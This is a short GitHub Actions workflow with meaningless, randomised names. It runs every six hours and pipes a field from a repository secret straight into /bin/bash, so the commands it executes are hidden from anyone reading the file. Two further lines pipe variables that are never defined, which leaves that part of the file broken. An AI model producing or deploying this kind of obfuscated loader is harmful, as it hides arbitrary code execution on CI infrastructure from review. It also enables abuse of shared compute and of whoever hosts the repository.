name: lianglingxiao5432

on:
  workflow_dispatch:
  schedule:
    - cron: '11 5/6 * * *'
jobs:  # 14986
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: lianglingxiao5432
        env:
          lt792: ${{ secrets.lt792 }}
        run: |
          echo $lt792 | jq -r .jpf417 | /bin/bash
          echo $qzek4661 | jq -r .dzw060 | /bin/bash
          echo $bjsa7568 | jq -r .rv1419 | /bin/bash

